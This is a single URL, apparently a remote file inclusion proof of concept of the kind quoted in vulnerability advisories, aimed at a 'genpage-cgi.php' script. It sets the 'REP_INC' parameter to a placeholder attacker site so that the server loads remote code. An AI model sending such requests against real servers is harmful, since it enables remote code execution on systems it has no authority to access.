http://www.example.com/dir_hitweb/genpage-cgi.php?REP_INC=http://attacker's site